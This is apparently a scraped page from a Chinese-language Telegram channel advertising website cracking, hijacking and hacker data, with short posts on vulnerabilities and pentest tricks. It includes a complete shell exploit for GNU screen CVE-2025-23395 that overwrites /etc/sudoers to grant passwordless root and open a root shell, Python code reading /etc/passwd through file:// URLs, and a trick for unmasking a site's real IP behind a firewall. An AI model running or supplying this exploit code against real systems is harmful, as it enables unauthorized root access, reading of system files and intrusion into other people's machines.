网站破解权限 渗透劫持 黑客数据
5.03K subscribers
570 photos
1 video
51 links
Download Telegram
去参加了Standoff 最佳 25 位研究人员的闭门表彰活动。

非常棒的场地和活动,感谢 организаторам!

业务合作: @YaMaa8
file://localhost/etc/passwd
会返回什么?

是的,会返回/etc/passwd

RFC 8089 中,正确的格式 被描述为 file://<host>/<path>,而 LFR 上的所有漏洞利用都只提到了 file:///<path>

而且,在 <host> 中可以输入 域名。系统会解析它,如果指向 127.0.0.1,则会返回文件内容。否则,你只会得到 DNS 的响应。

Python 继续

from urllib.request import urlopen

content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')

print(content)




业务合作: @YaMaa8
🚨 发现 4 个高危 远程代码执行 (RCE) 漏洞,存在于由第三方开发者“Sotbit”开发的 Bitrix CMS 模块 中。

再次出现不安全的序列化问题。这些插件漏洞与输入数据验证不足有关。利用这些漏洞可能允许攻击者远程执行任意代码。已存在利用代码,并且正在被积极使用。开发者建议升级到最新版本,或应用 补丁。

受影响的插件列表:
⚫️ Sotbit: Origami (已下线,版本 14.1.0 及更早版本)
⚫️ Sotbit: 增强型评论 (版本 1.4.1 及更早版本)
⚫️ Sotbit: 快速在可视化编辑器中上传图片
⚫️ Sotbit: 多区域支持
⚫️ Sotbit: 内容解析器

严重程度:8.8/10 (CVSS 3.0)


业务合作: @YaMaa8
Please open Telegram to view this post
VIEW IN TELEGRAM
GNU screen 漏洞,允许以 root 权限执行代码 (CVE-2025-23395)

该漏洞源于以下原因:当以 root 权限启动时,`logfile_reopen()` 函数在权限降级之前执行,但它处理的数据是在当前非特权用户的上下文中,该用户启动了 screen。值得注意的是,初始日志文件的打开操作会正确地进行权限降级,但当再次打开日志文件时,权限降级操作不会执行。

利用方法:
#!/bin/sh
# screen CVE-2025-23395 漏洞利用
# blablabla
# blasty
F=$(mktemp)
L=$HOME/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] 启动 GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] 日志文件已出现,开始利用"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ]; then
echo "[+] 成功,我们搞定了"
sudo sh
else
echo "[-] 漏洞利用失败 :("
fi
rm -rf $F $L



业务合作: @YaMaa8
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2025-22828

在 Apache CloudStack 4.16.0 及更高版本中,发现了一个访问控制漏洞,该漏洞允许了解资源 UUID 的用户读取或添加评论(标注)到他们没有访问权限的资源上。

业务合作: @YaMaa8
有时,在渗透测试过程中,需要确定网站的真实IP地址,而这个地址可能被Web应用防火墙(WAF)或其他安全机制隐藏。

一个经常被忽略的技巧是,简单地获取一封邮件。

当然,首先需要找到发送邮件的功能。这可能是注册确认、密码重置通知、订阅广告邮件等等,并不重要。最重要的是收到一封邮件。

收到邮件后,点击“显示原始邮件”,然后就可以查看发件人的IP地址。

业务合作: @YaMaa8
CVE-2024-33113:D-LINK DIR-845L 信息泄露漏洞

D-LINK DIR-845L 设备存在通过 bsc_sms_inbox.php 文件泄露信息的漏洞。

利用方法


业务合作: @YaMaa8